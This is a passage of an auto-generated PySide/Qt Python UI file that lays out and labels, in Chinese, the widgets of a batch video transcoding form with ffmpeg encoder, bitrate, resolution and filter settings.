QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.VcodecpIFbox01.addItem(self.VcodecpIFhorizontalSpacer) self.VcodecpIFpushBtn = PrimaryPushButton(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFpushBtn.setObjectName(u"VcodecpIFpushBtn") sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.VcodecpIFpushBtn.sizePolicy().hasHeightForWidth()) self.VcodecpIFpushBtn.setSizePolicy(sizePolicy2) self.VcodecpIFpushBtn.setMinimumSize(QSize(240, 60)) font2 = QFont() font2.setPointSize(16) font2.setBold(True) font2.setKerning(True) self.VcodecpIFpushBtn.setFont(font2) self.VcodecpIFpushBtn.setFlat(False) self.VcodecpIFbox01.addWidget(self.VcodecpIFpushBtn) self.VcodecpIFSTBtn = QPushButton(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFSTBtn.setObjectName(u"VcodecpIFSTBtn") self.VcodecpIFSTBtn.setMinimumSize(QSize(120, 60)) font3 = QFont() font3.setPointSize(16) font3.setBold(True) self.VcodecpIFSTBtn.setFont(font3) self.VcodecpIFbox01.addWidget(self.VcodecpIFSTBtn) self.VcodecpIFpushBtn_2 = PushButton(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFpushBtn_2.setObjectName(u"VcodecpIFpushBtn_2") self.VcodecpIFpushBtn_2.setMinimumSize(QSize(80, 60)) self.VcodecpIFpushBtn_2.setFont(font3) self.VcodecpIFbox01.addWidget(self.VcodecpIFpushBtn_2) self.verticalLayout_3.addLayout(self.VcodecpIFbox01) self.VcodecpIFbox02 = QFrame(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFbox02.setObjectName(u"VcodecpIFbox02") self.VcodecpIFbox02.setEnabled(True) sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.VcodecpIFbox02.sizePolicy().hasHeightForWidth()) self.VcodecpIFbox02.setSizePolicy(sizePolicy3) self.VcodecpIFbox02.setMinimumSize(QSize(480, 145)) self.VcodecpIFbox02.setMaximumSize(QSize(16777215, 240)) self.VcodecpIFbox02.setFrameShape(QFrame.Shape.StyledPanel) self.VcodecpIFbox02.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout = QGridLayout(self.VcodecpIFbox02) self.gridLayout.setObjectName(u"gridLayout") self.VcodecpIFinputfile = PushButton(self.VcodecpIFbox02) self.VcodecpIFinputfile.setObjectName(u"VcodecpIFinputfile") font4 = QFont() font4.setPointSize(12) font4.setBold(True) self.VcodecpIFinputfile.setFont(font4) self.gridLayout.addWidget(self.VcodecpIFinputfile, 0, 0, 1, 1) self.VcodecpIFinputclear = PushButton(self.VcodecpIFbox02) self.VcodecpIFinputclear.setObjectName(u"VcodecpIFinputclear") self.VcodecpIFinputclear.setFont(font4) self.gridLayout.addWidget(self.VcodecpIFinputclear, 0, 1, 1, 1) self.VcodecpIFoutputfolder = QPushButton(self.VcodecpIFbox02) self.VcodecpIFoutputfolder.setObjectName(u"VcodecpIFoutputfolder") self.VcodecpIFoutputfolder.setFont(font4) self.gridLayout.addWidget(self.VcodecpIFoutputfolder, 0, 2, 1, 1) self.VcodecpIFinputlist = ListWidget(self.VcodecpIFbox02) self.VcodecpIFinputlist.setObjectName(u"VcodecpIFinputlist") sizePolicy4 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Preferred) sizePolicy4.setHorizontalStretch(0) sizePolicy4.setVerticalStretch(0) sizePolicy4.setHeightForWidth(self.VcodecpIFinputlist.sizePolicy().hasHeightForWidth()) self.VcodecpIFinputlist.setSizePolicy(sizePolicy4) self.VcodecpIFinputlist.setMinimumSize(QSize(0, 120)) self.VcodecpIFinputlist.setMaximumSize(QSize(16777215, 200)) self.VcodecpIFinputlist.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOn) self.VcodecpIFinputlist.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded) self.VcodecpIFinputlist.setSizeAdjustPolicy(QAbstractScrollArea.SizeAdjustPolicy.AdjustIgnored) self.VcodecpIFinputlist.setDragEnabled(False) self.gridLayout.addWidget(self.VcodecpIFinputlist, 1, 0, 1, 3) self.verticalLayout_3.addWidget(self.VcodecpIFbox02) self.VcodecpIFbox03 = QHBoxLayout() self.VcodecpIFbox03.setObjectName(u"VcodecpIFbox03") self.VcodecpIFTitle2_3 = QLabel(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFTitle2_3.setObjectName(u"VcodecpIFTitle2_3") sizePolicy5 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Maximum) sizePolicy5.setHorizontalStretch(0) sizePolicy5.setVerticalStretch(0) sizePolicy5.setHeightForWidth(self.VcodecpIFTitle2_3.sizePolicy().hasHeightForWidth()) self.VcodecpIFTitle2_3.setSizePolicy(sizePolicy5) self.VcodecpIFTitle2_3.setMinimumSize(QSize(240, 45)) self.VcodecpIFTitle2_3.setMaximumSize(QSize(600, 16777215)) self.VcodecpIFTitle2_3.setFont(font1) self.VcodecpIFbox03.addWidget(self.VcodecpIFTitle2_3) self.VcodecpIFTitle2_2 = QLabel(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFTitle2_2.setObjectName(u"VcodecpIFTitle2_2") sizePolicy6 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Minimum) sizePolicy6.setHorizontalStretch(0) sizePolicy6.setVerticalStretch(0) sizePolicy6.setHeightForWidth(self.VcodecpIFTitle2_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFTitle2_2.setSizePolicy(sizePolicy6) self.VcodecpIFTitle2_2.setMinimumSize(QSize(60, 45)) self.VcodecpIFTitle2_2.setMaximumSize(QSize(240, 45)) self.VcodecpIFTitle2_2.setFont(font1) self.VcodecpIFbox03.addWidget(self.VcodecpIFTitle2_2) self.verticalLayout_3.addLayout(self.VcodecpIFbox03) self.VcodecpIFbox04 = QHBoxLayout() self.VcodecpIFbox04.setObjectName(u"VcodecpIFbox04") self.VcodecpIFframe_2 = QFrame(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFframe_2.setObjectName(u"VcodecpIFframe_2") sizePolicy6.setHeightForWidth(self.VcodecpIFframe_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFframe_2.setSizePolicy(sizePolicy6) self.VcodecpIFframe_2.setMinimumSize(QSize(600, 360)) self.VcodecpIFframe_2.setMaximumSize(QSize(600, 360)) self.VcodecpIFframe_2.setFrameShape(QFrame.Shape.StyledPanel) self.VcodecpIFframe_2.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout_2 = QVBoxLayout(self.VcodecpIFframe_2) self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.VcodecpIFgridLayout = QGridLayout() self.VcodecpIFgridLayout.setObjectName(u"VcodecpIFgridLayout") self.VcodecpIFgridLayout.setHorizontalSpacing(24) self.VcodecpIFgridLayout.setVerticalSpacing(16) self.VcodecpIFlabel_7 = QLabel(self.VcodecpIFframe_2) self.VcodecpIFlabel_7.setObjectName(u"VcodecpIFlabel_7") font5 = QFont() font5.setPointSize(12) font5.setBold(True) font5.setKerning(True) self.VcodecpIFlabel_7.setFont(font5) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlabel_7, 2, 2, 1, 1) self.VcodecpIFlineEditAE = EditableComboBox(self.VcodecpIFframe_2) self.VcodecpIFlineEditAE.setObjectName(u"VcodecpIFlineEditAE") self.VcodecpIFlineEditAE.setMinimumSize(QSize(0, 30)) font6 = QFont() font6.setPointSize(12) self.VcodecpIFlineEditAE.setFont(font6) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlineEditAE, 3, 1, 1, 1) self.VcodecpIFcomboBox_2 = ComboBox(self.VcodecpIFframe_2) self.VcodecpIFcomboBox_2.addItem("") self.VcodecpIFcomboBox_2.addItem("") self.VcodecpIFcomboBox_2.addItem("") self.VcodecpIFcomboBox_2.addItem("") self.VcodecpIFcomboBox_2.addItem("") self.VcodecpIFcomboBox_2.setObjectName(u"VcodecpIFcomboBox_2") sizePolicy6.setHeightForWidth(self.VcodecpIFcomboBox_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFcomboBox_2.setSizePolicy(sizePolicy6) self.VcodecpIFcomboBox_2.setMinimumSize(QSize(0, 30)) font7 = QFont() font7.setPointSize(12) font7.setKerning(True) self.VcodecpIFcomboBox_2.setFont(font7) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFcomboBox_2, 0, 3, 1, 1) self.VcodecpIFplainTextEdit = PlainTextEdit(self.VcodecpIFframe_2) self.VcodecpIFplainTextEdit.setObjectName(u"VcodecpIFplainTextEdit") self.VcodecpIFplainTextEdit.setFont(font6) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFplainTextEdit, 5, 1, 1, 3) self.VcodecpIFlabel_4 = QLabel(self.VcodecpIFframe_2) self.VcodecpIFlabel_4.setObjectName(u"VcodecpIFlabel_4") self.VcodecpIFlabel_4.setFont(font5) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlabel_4, 3, 2, 1, 1) self.VcodecpIFTitle3_2 = QLabel(self.VcodecpIFframe_2) self.VcodecpIFTitle3_2.setObjectName(u"VcodecpIFTitle3_2") self.VcodecpIFTitle3_2.setFont(font5) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFTitle3_2, 0, 0, 1, 1) self.VcodecpIFlabel = QLabel(self.VcodecpIFframe_2) self.VcodecpIFlabel.setObjectName(u"VcodecpIFlabel") self.VcodecpIFlabel.setFont(font5) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlabel, 0, 2, 1, 1) self.VcodecpIFlineEdit_2 = EditableComboBox(self.VcodecpIFframe_2) self.VcodecpIFlineEdit_2.setObjectName(u"VcodecpIFlineEdit_2") sizePolicy7 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Fixed) sizePolicy7.setHorizontalStretch(0) sizePolicy7.setVerticalStretch(0) sizePolicy7.setHeightForWidth(self.VcodecpIFlineEdit_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFlineEdit_2.setSizePolicy(sizePolicy7) font8 = QFont() font8.setPointSize(10) font8.setKerning(True) self.VcodecpIFlineEdit_2.setFont(font8) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlineEdit_2, 1, 3, 1, 1) self.VcodecpIFcomboBox_5 = ComboBox(self.VcodecpIFframe_2) self.VcodecpIFcomboBox_5.addItem("") self.VcodecpIFcomboBox_5.setObjectName(u"VcodecpIFcomboBox_5") self.VcodecpIFcomboBox_5.setEnabled(True) sizePolicy1.setHeightForWidth(self.VcodecpIFcomboBox_5.sizePolicy().hasHeightForWidth()) self.VcodecpIFcomboBox_5.setSizePolicy(sizePolicy1) self.VcodecpIFcomboBox_5.setMinimumSize(QSize(0, 30)) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFcomboBox_5, 4, 1, 1, 3) self.VcodecpIFcheckBox_2 = CheckBox(self.VcodecpIFframe_2) self.VcodecpIFcheckBox_2.setObjectName(u"VcodecpIFcheckBox_2") font9 = QFont() font9.setPointSize(10) font9.setBold(True) font9.setKerning(True) self.VcodecpIFcheckBox_2.setFont(font9) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFcheckBox_2, 1, 0, 1, 1) self.VcodecpIFspinBox_2 = SpinBox(self.VcodecpIFframe_2) self.VcodecpIFspinBox_2.setObjectName(u"VcodecpIFspinBox_2") sizePolicy6.setHeightForWidth(self.VcodecpIFspinBox_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFspinBox_2.setSizePolicy(sizePolicy6) self.VcodecpIFspinBox_2.setFont(font7) self.VcodecpIFspinBox_2.setMaximum(51) self.VcodecpIFspinBox_2.setValue(23) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFspinBox_2, 2, 3, 1, 1) self.VcodecpIFcheckBox_3 = CheckBox(self.VcodecpIFframe_2) self.VcodecpIFcheckBox_3.setObjectName(u"VcodecpIFcheckBox_3") self.VcodecpIFcheckBox_3.setFont(font9) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFcheckBox_3, 1, 2, 1, 1) self.VcodecpIFlineEditVE = EditableComboBox(self.VcodecpIFframe_2) self.VcodecpIFlineEditVE.setObjectName(u"VcodecpIFlineEditVE") self.VcodecpIFlineEditVE.setMinimumSize(QSize(0, 30)) self.VcodecpIFlineEditVE.setFont(font6) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlineEditVE, 0, 1, 1, 1) self.VcodecpIFlabel_6 = QLabel(self.VcodecpIFframe_2) self.VcodecpIFlabel_6.setObjectName(u"VcodecpIFlabel_6") self.VcodecpIFlabel_6.setFont(font5) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlabel_6, 2, 0, 1, 1) self.VcodecpIFspinBox = SpinBox(self.VcodecpIFframe_2) self.VcodecpIFspinBox.setObjectName(u"VcodecpIFspinBox") sizePolicy6.setHeightForWidth(self.VcodecpIFspinBox.sizePolicy().hasHeightForWidth()) self.VcodecpIFspinBox.setSizePolicy(sizePolicy6) self.VcodecpIFspinBox.setMinimumSize(QSize(0, 30)) self.VcodecpIFspinBox.setFont(font7) self.VcodecpIFspinBox.setMaximum(40000) self.VcodecpIFspinBox.setSingleStep(1000) self.VcodecpIFspinBox.setValue(800) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFspinBox, 2, 1, 1, 1) self.VcodecpIFlineEdit = EditableComboBox(self.VcodecpIFframe_2) self.VcodecpIFlineEdit.setObjectName(u"VcodecpIFlineEdit") sizePolicy7.setHeightForWidth(self.VcodecpIFlineEdit.sizePolicy().hasHeightForWidth()) self.VcodecpIFlineEdit.setSizePolicy(sizePolicy7) self.VcodecpIFlineEdit.setFont(font8) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlineEdit, 1, 1, 1, 1) self.VcodecpIFlabel_3 = QLabel(self.VcodecpIFframe_2) self.VcodecpIFlabel_3.setObjectName(u"VcodecpIFlabel_3") self.VcodecpIFlabel_3.setFont(font5) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlabel_3, 3, 0, 1, 1) self.VcodecpIFlabel_5 = QLabel(self.VcodecpIFframe_2) self.VcodecpIFlabel_5.setObjectName(u"VcodecpIFlabel_5") self.VcodecpIFlabel_5.setFont(font2) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFlabel_5, 5, 0, 1, 1) self.VcodecpIFcheckBox = CheckBox(self.VcodecpIFframe_2) self.VcodecpIFcheckBox.setObjectName(u"VcodecpIFcheckBox") self.VcodecpIFcheckBox.setSizeIncrement(QSize(0, 0)) font10 = QFont() font10.setPointSize(12) font10.setBold(True) font10.setKerning(True) font10.setHintingPreference(QFont.PreferDefaultHinting) self.VcodecpIFcheckBox.setFont(font10) self.VcodecpIFcheckBox.setMouseTracking(True) self.VcodecpIFcheckBox.setLayoutDirection(Qt.LayoutDirection.LeftToRight) self.VcodecpIFcheckBox.setInputMethodHints(Qt.InputMethodHint.ImhNone) self.VcodecpIFcheckBox.setAutoExclusive(False) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFcheckBox, 4, 0, 1, 1) self.VcodecpIFcomboBox_3 = ComboBox(self.VcodecpIFframe_2) self.VcodecpIFcomboBox_3.addItem("") self.VcodecpIFcomboBox_3.addItem("") self.VcodecpIFcomboBox_3.addItem("") self.VcodecpIFcomboBox_3.addItem("") self.VcodecpIFcomboBox_3.addItem("") self.VcodecpIFcomboBox_3.setObjectName(u"VcodecpIFcomboBox_3") sizePolicy3.setHeightForWidth(self.VcodecpIFcomboBox_3.sizePolicy().hasHeightForWidth()) self.VcodecpIFcomboBox_3.setSizePolicy(sizePolicy3) self.VcodecpIFcomboBox_3.setMinimumSize(QSize(0, 30)) self.VcodecpIFcomboBox_3.setFont(font7) self.VcodecpIFgridLayout.addWidget(self.VcodecpIFcomboBox_3, 3, 3, 1, 1) self.verticalLayout_2.addLayout(self.VcodecpIFgridLayout) self.VcodecpIFbox04.addWidget(self.VcodecpIFframe_2) self.VcodecpIFframe_3 = QFrame(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFframe_3.setObjectName(u"VcodecpIFframe_3") sizePolicy6.setHeightForWidth(self.VcodecpIFframe_3.sizePolicy().hasHeightForWidth()) self.VcodecpIFframe_3.setSizePolicy(sizePolicy6) self.VcodecpIFframe_3.setMinimumSize(QSize(280, 360)) self.VcodecpIFframe_3.setMaximumSize(QSize(480, 360)) self.VcodecpIFframe_3.setFrameShape(QFrame.Shape.StyledPanel) self.VcodecpIFframe_3.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout_3 = QGridLayout(self.VcodecpIFframe_3) self.gridLayout_3.setObjectName(u"gridLayout_3") self.VcodecpIFlabel_2 = QLabel(self.VcodecpIFframe_3) self.VcodecpIFlabel_2.setObjectName(u"VcodecpIFlabel_2") sizePolicy6.setHeightForWidth(self.VcodecpIFlabel_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFlabel_2.setSizePolicy(sizePolicy6) self.VcodecpIFlabel_2.setMinimumSize(QSize(0, 35)) self.VcodecpIFlabel_2.setMaximumSize(QSize(16777215, 40)) self.VcodecpIFlabel_2.setFont(font5) self.gridLayout_3.addWidget(self.VcodecpIFlabel_2, 4, 0, 1, 1) self.VcodecpIFcheckBox_4 = CheckBox(self.VcodecpIFframe_3) self.VcodecpIFcheckBox_4.setObjectName(u"VcodecpIFcheckBox_4") sizePolicy6.setHeightForWidth(self.VcodecpIFcheckBox_4.sizePolicy().hasHeightForWidth()) self.VcodecpIFcheckBox_4.setSizePolicy(sizePolicy6) self.VcodecpIFcheckBox_4.setMinimumSize(QSize(0, 35)) self.VcodecpIFcheckBox_4.setMaximumSize(QSize(16777215, 40)) self.VcodecpIFcheckBox_4.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFcheckBox_4, 1, 1, 1, 1) self.VcodecpIFtimeEdit_3 = TimeEdit(self.VcodecpIFframe_3) self.VcodecpIFtimeEdit_3.setObjectName(u"VcodecpIFtimeEdit_3") self.VcodecpIFtimeEdit_3.setMinimumSize(QSize(160, 30)) self.VcodecpIFtimeEdit_3.setFont(font7) self.gridLayout_3.addWidget(self.VcodecpIFtimeEdit_3, 5, 0, 1, 1) self.VcodecpIFcutsomFilter = QLineEdit(self.VcodecpIFframe_3) self.VcodecpIFcutsomFilter.setObjectName(u"VcodecpIFcutsomFilter") self.gridLayout_3.addWidget(self.VcodecpIFcutsomFilter, 2, 0, 1, 1) self.VcodecpIFpushButton_4 = PushButton(self.VcodecpIFframe_3) self.VcodecpIFpushButton_4.setObjectName(u"VcodecpIFpushButton_4") sizePolicy6.setHeightForWidth(self.VcodecpIFpushButton_4.sizePolicy().hasHeightForWidth()) self.VcodecpIFpushButton_4.setSizePolicy(sizePolicy6) self.VcodecpIFpushButton_4.setMinimumSize(QSize(0, 30)) self.VcodecpIFpushButton_4.setFont(font6) self.gridLayout_3.addWidget(self.VcodecpIFpushButton_4, 8, 1, 1, 1) self.VcodecpIFlabel_9 = QLabel(self.VcodecpIFframe_3) self.VcodecpIFlabel_9.setObjectName(u"VcodecpIFlabel_9") self.VcodecpIFlabel_9.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFlabel_9, 7, 1, 1, 1) self.VcodecpIFcheckBox_merge = CheckBox(self.VcodecpIFframe_3) self.VcodecpIFcheckBox_merge.setObjectName(u"VcodecpIFcheckBox_merge") self.VcodecpIFcheckBox_merge.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFcheckBox_merge, 3, 1, 1, 1) self.VcodecpIFtFormat = EditableComboBox(self.VcodecpIFframe_3) self.VcodecpIFtFormat.setObjectName(u"VcodecpIFtFormat") self.VcodecpIFtFormat.setFont(font6) self.gridLayout_3.addWidget(self.VcodecpIFtFormat, 9, 1, 1, 1) self.VcodecpIFpushButton_3 = PushButton(self.VcodecpIFframe_3) self.VcodecpIFpushButton_3.setObjectName(u"VcodecpIFpushButton_3") sizePolicy4.setHeightForWidth(self.VcodecpIFpushButton_3.sizePolicy().hasHeightForWidth()) self.VcodecpIFpushButton_3.setSizePolicy(sizePolicy4) self.VcodecpIFpushButton_3.setMinimumSize(QSize(0, 30)) self.VcodecpIFpushButton_3.setFont(font6) self.gridLayout_3.addWidget(self.VcodecpIFpushButton_3, 5, 1, 1, 1) self.VcodecpIFtimeEdit_2 = TimeEdit(self.VcodecpIFframe_3) self.VcodecpIFtimeEdit_2.setObjectName(u"VcodecpIFtimeEdit_2") self.VcodecpIFtimeEdit_2.setMinimumSize(QSize(160, 30)) self.VcodecpIFtimeEdit_2.setFont(font7) self.gridLayout_3.addWidget(self.VcodecpIFtimeEdit_2, 9, 0, 1, 1) self.VcodecpIFlabel_8 = QLabel(self.VcodecpIFframe_3) self.VcodecpIFlabel_8.setObjectName(u"VcodecpIFlabel_8") self.VcodecpIFlabel_8.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFlabel_8, 4, 1, 1, 1) self.VcodecpIFClearFil = PushButton(self.VcodecpIFframe_3) self.VcodecpIFClearFil.setObjectName(u"VcodecpIFClearFil") self.VcodecpIFClearFil.setMinimumSize(QSize(0, 40)) self.gridLayout_3.addWidget(self.VcodecpIFClearFil, 1, 0, 1, 1) self.VcodecpIFradioButton = RadioButton(self.VcodecpIFframe_3) self.VcodecpIFradioButton.setObjectName(u"VcodecpIFradioButton") self.VcodecpIFradioButton.setMaximumSize(QSize(16777215, 20)) self.VcodecpIFradioButton.setFont(font4) self.VcodecpIFradioButton.setChecked(True) self.gridLayout_3.addWidget(self.VcodecpIFradioButton, 7, 0, 1, 1) self.VcodecpIFdoubleSpinBox = DoubleSpinBox(self.VcodecpIFframe_3) self.VcodecpIFdoubleSpinBox.setObjectName(u"VcodecpIFdoubleSpinBox") sizePolicy7.setHeightForWidth(self.VcodecpIFdoubleSpinBox.sizePolicy().hasHeightForWidth()) self.VcodecpIFdoubleSpinBox.setSizePolicy(sizePolicy7) self.VcodecpIFdoubleSpinBox.setMinimumSize(QSize(150, 30)) self.VcodecpIFdoubleSpinBox.setFont(font7) self.VcodecpIFdoubleSpinBox.setMinimum(0.500000000000000) self.VcodecpIFdoubleSpinBox.setMaximum(2.000000000000000) self.VcodecpIFdoubleSpinBox.setSingleStep(0.050000000000000) self.VcodecpIFdoubleSpinBox.setValue(1.000000000000000) self.gridLayout_3.addWidget(self.VcodecpIFdoubleSpinBox, 2, 1, 1, 1) self.VcodecpIFcheckBox_extract = CheckBox(self.VcodecpIFframe_3) self.VcodecpIFcheckBox_extract.setObjectName(u"VcodecpIFcheckBox_extract") self.VcodecpIFcheckBox_extract.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFcheckBox_extract, 3, 0, 1, 1) self.VcodecpIFradioButton_2 = RadioButton(self.VcodecpIFframe_3) self.VcodecpIFradioButton_2.setObjectName(u"VcodecpIFradioButton_2") self.VcodecpIFradioButton_2.setMaximumSize(QSize(16777215, 20)) self.VcodecpIFradioButton_2.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFradioButton_2, 8, 0, 1, 1) self.VcodecpIFbox04.addWidget(self.VcodecpIFframe_3) self.verticalLayout_3.addLayout(self.VcodecpIFbox04) self.VcodecpIFconsole = PlainTextEdit(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFconsole.setObjectName(u"VcodecpIFconsole") sizePolicy3.setHeightForWidth(self.VcodecpIFconsole.sizePolicy().hasHeightForWidth()) self.VcodecpIFconsole.setSizePolicy(sizePolicy3) self.VcodecpIFconsole.setMinimumSize(QSize(640, 160)) self.VcodecpIFconsole.setMaximumSize(QSize(6400, 300)) self.VcodecpIFconsole.setUndoRedoEnabled(False) self.VcodecpIFconsole.setLineWrapMode(QPlainTextEdit.LineWrapMode.WidgetWidth) self.VcodecpIFconsole.setReadOnly(True) self.verticalLayout_3.addWidget(self.VcodecpIFconsole) self.VcodecpIFscrollArea.setWidget(self.VcodecpIFfacescrollAreaWidgetContents) self.verticalLayout.addWidget(self.VcodecpIFscrollArea) self.retranslateUi(VcodecpInterface) self.VcodecpIFpushBtn.setDefault(True) QMetaObject.connectSlotsByName(VcodecpInterface) # setupUi def retranslateUi(self, VcodecpInterface): VcodecpInterface.setWindowTitle(QCoreApplication.translate("VcodecpInterface", u"Form", None)) self.VcodecpIFTitle1.setText(QCoreApplication.translate("VcodecpInterface", u"\u6279\u5904\u7406", None)) self.VcodecpIFTitle2.setText(QCoreApplication.translate("VcodecpInterface", u"\u89c6\u9891", None)) self.label.setText(QCoreApplication.translate("VcodecpInterface", u"\u4e0d\u6539\u53d8\u540e\u7f00\u540d\u7684\u6279\u91cf\u5904\u7406", None)) self.VcodecpIFpushBtn.setText(QCoreApplication.translate("VcodecpInterface", u"\u5904\u7406\u89c6\u9891", None)) self.VcodecpIFSTBtn.setText(QCoreApplication.translate("VcodecpInterface", u"\u4e2d\u6b62\u5904\u7406", None)) self.VcodecpIFpushBtn_2.setText(QCoreApplication.translate("VcodecpInterface", u"\u89e3\u51bb", None)) self.VcodecpIFinputfile.setText(QCoreApplication.translate("VcodecpInterface", u"\u6dfb\u52a0\u6587\u4ef6", None)) self.VcodecpIFinputclear.setText(QCoreApplication.translate("VcodecpInterface", u"\u6e05\u9664", None)) self.VcodecpIFoutputfolder.setText(QCoreApplication.translate("VcodecpInterface", u"\u9009\u62e9\u8f93\u51fa\u6587\u4ef6\u5939", None)) self.VcodecpIFTitle2_3.setText(QCoreApplication.translate("VcodecpInterface", u"\u7f16\u7801\u8bbe\u7f6e", None)) self.VcodecpIFTitle2_2.setText(QCoreApplication.translate("VcodecpInterface", u"\u6ee4\u955c\u8bbe\u7f6e", None)) self.VcodecpIFlabel_7.setText(QCoreApplication.translate("VcodecpInterface", u"\u89c6\u9891\u54c1\u8d28", None)) self.VcodecpIFlineEditAE.setText(QCoreApplication.translate("VcodecpInterface", u"aac", None)) self.VcodecpIFcomboBox_2.setItemText(0, QCoreApplication.translate("VcodecpInterface", u"CRF\u54c1\u8d28-medium", None)) self.VcodecpIFcomboBox_2.setItemText(1, QCoreApplication.translate("VcodecpInterface", u"CRF\u54c1\u8d28-fast", None)) self.VcodecpIFcomboBox_2.setItemText(2, QCoreApplication.translate("VcodecpInterface", u"CBR\u5e73\u5747\u7801\u7387-medium", None)) self.VcodecpIFcomboBox_2.setItemText(3, QCoreApplication.translate("VcodecpInterface", u"CBR\u5e73\u5747\u7801\u7387-fast", None)) self.VcodecpIFcomboBox_2.setItemText(4, QCoreApplication.translate("VcodecpInterface", u"CQP\u786c\u7f16\u54c1\u8d28(*qsv)", None)) self.VcodecpIFplainTextEdit.setPlainText(QCoreApplication.translate("VcodecpInterface", u"-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k", None)) self.VcodecpIFlabel_4.setText(QCoreApplication.translate("VcodecpInterface", u"\u97f3\u9891\u7f16\u7801\u53c2\u6570", None)) self.VcodecpIFTitle3_2.setText(QCoreApplication.translate("VcodecpInterface", u"\u89c6\u9891\u7f16\u7801\u5668", None)) self.VcodecpIFlabel.setText(QCoreApplication.translate("VcodecpInterface", u"\u89c6\u9891\u7f16\u7801\u53c2\u6570", None)) self.VcodecpIFlineEdit_2.setText(QCoreApplication.translate("VcodecpInterface", u"60", None)) self.VcodecpIFcomboBox_5.setItemText(0, QCoreApplication.translate("VcodecpInterface", u"\u9ed8\u8ba4", None)) self.VcodecpIFcheckBox_2.setText(QCoreApplication.translate("VcodecpInterface", u"\u5206\u8fa8\u7387", None)) self.VcodecpIFcheckBox_3.setText(QCoreApplication.translate("VcodecpInterface", u"\u5e27\u7387", None)) self.VcodecpIFlineEditVE.setText(QCoreApplication.translate("VcodecpInterface", u"libx264", None)) self.VcodecpIFlabel_6.setText(QCoreApplication.translate("VcodecpInterface", u"\u89c6\u9891\u7801\u7387kbps", None)) self.VcodecpIFlineEdit.setText(QCoreApplication.translate("VcodecpInterface", u"1920x1080", None)) self.VcodecpIFlabel_3.setText(QCoreApplication.translate("VcodecpInterface", u"\u97f3\u9891\u7f16\u7801\u5668", None)) self.VcodecpIFlabel_5.setText(QCoreApplication.translate("VcodecpInterface", u"\u81ea\u5b9a\u4e49\u7f16\u7801", None)) self.VcodecpIFcheckBox.setText(QCoreApplication.translate("VcodecpInterface", u"\u4f7f\u7528\u9884\u8bbe", None)) self.VcodecpIFcomboBox_3.setItemText(0, QCoreApplication.translate("VcodecpInterface", u"128k", None)) self.VcodecpIFcomboBox_3.setItemText(1, QCoreApplication.translate("VcodecpInterface", u"64k", None)) self.VcodecpIFcomboBox_3.setItemText(2, QCoreApplication.translate("VcodecpInterface", u"192k", None)) self.VcodecpIFcomboBox_3.setItemText(3, QCoreApplication.translate("VcodecpInterface", u"320k", None)) self.VcodecpIFcomboBox_3.setItemText(4, QCoreApplication.translate("VcodecpInterface", u"512k", None)) self.VcodecpIFlabel_2.setText(QCoreApplication.translate("VcodecpInterface", u"\u7247\u5934\u65f6\u957f", None)) self.VcodecpIFcheckBox_4.setText(QCoreApplication.translate("VcodecpInterface", u"\u52a0\u901f\u500d\u7387", None)) self.VcodecpIFtimeEdit_3.setDisplayFormat(QCoreApplication.translate("VcodecpInterface", u"H:mm:ss:zzz", None)) self.VcodecpIFcutsomFilter.setText(QCoreApplication.translate("VcodecpInterface", 